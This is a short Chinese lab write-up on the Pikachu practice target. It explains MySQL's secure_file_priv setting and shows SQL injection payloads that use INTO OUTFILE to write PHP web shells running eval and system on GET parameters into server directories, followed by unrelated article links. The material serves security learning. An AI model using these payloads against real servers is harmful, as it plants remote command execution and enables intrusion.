Pikachu-Sql-Inject - 通过sql进行远程服务器控制(试验)

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

查看命令:

复制代码
show variables like "secure%" 
//或者
select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

into outfile ,将select 的结果写入到指定的文件中;

复制代码
vince' union select " <?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"#
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/www/html/2.php"#

//构造sql
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/lib/mysql-files/2.php"#

执行sql语句

进入到服务器目录下,看到文件已生成;

这个实验有三个前提条件:

1、需要知道远程服务器的文件目录;

2、需要该目录有写权限;

3、需要数据库开启secure_file_priv权限;

相关推荐
私人珍藏库15 分钟前
[Android] BBLL 开源第三方B哩电视TV端
android·app·生活·工具·多功能
iangyu1 小时前
linux配置时间同步
linux·运维·服务器
从零开始的代码生活_1 小时前
NAT、代理服务与内网穿透详解
linux·服务器·网络·c++·http·智能路由器
灯厂码农2 小时前
C语言内存管理——内存对齐与共用体union
linux·服务器·c语言
GV191rLvq2 小时前
基于Socket实现的最简单的Web服务器【ASP.NET原理分析】
服务器·前端·asp.net
运维管理2 小时前
H3C SecPath W2000-G[AK]系列Web应用防火墙 典型配置举例(E6711 E6712 E6713)-6W108-H3C 官方配置
服务器·网络·php
杉氧2 小时前
跨平台资源管理:一套代码如何搞定 Android、iOS 和 Web 的图片与多语言?
android·架构·android jetpack
C+-C资深大佬3 小时前
python while循环
服务器·开发语言·python
Tian_Hang3 小时前
eclipse ditto 学习笔记
运维·服务器·开发语言·javascript·3d
iCxhust3 小时前
linux目录是否保存在硬盘 启动后读入解析的
linux·运维·服务器